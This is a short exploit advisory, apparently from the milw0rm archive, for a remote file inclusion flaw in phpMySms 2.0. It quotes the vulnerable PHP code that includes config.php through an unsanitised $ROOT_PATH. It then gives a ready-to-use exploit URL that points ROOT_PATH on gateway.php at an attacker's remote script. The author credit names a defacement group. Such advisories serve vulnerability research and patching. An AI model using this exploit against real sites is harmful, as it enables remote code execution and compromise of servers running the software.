phpMySms 2.0 (ROOT_PATH) Remote File Include VulnerabilityPhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
URL : Http://www.phpmysms.com
 
Author=Persian-Defacer
www.Hacking-Boys.com
==============================================================
if (($_POST[mode] == `1`) or ($_GET[mode] == `1`)) {
include (`config.php`);
} else {
include (`$ROOT_PATH/config.php`);
}
==============================================================


Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

# milw0rm.com [2006-06-24]